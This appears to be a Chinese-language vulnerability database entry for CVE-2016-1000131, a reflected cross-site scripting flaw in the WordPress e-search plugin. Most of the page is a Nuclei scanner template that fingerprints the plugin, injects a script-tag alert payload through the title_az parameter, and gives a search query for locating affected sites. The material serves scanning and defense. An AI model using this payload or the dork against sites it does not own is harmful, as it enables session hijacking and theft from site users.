CVE-2016-1000131: WordPress e-search <=1.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress e-search | POC: 已公开

漏洞描述

WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2016-1000131

info:
  name: WordPress e-search <=1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=393
    - https://wordpress.org/plugins/e-search
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000131
    cwe-id: CWE-79
    epss-score: 0.02155
    epss-percentile: 0.83655
    cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "e-search_project"
    product: esearch
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/e-search\""
  tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/e-search/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Search'
          - 'Tags:'
          - 'Tested up to:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009155088ebae41e1b3d38d698bf533b965b7945b44d0408209774bf48ad596b05022100abd151efd4579a9630091343dd8e276e1957b535a02205f5732ed55e8a1a583e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐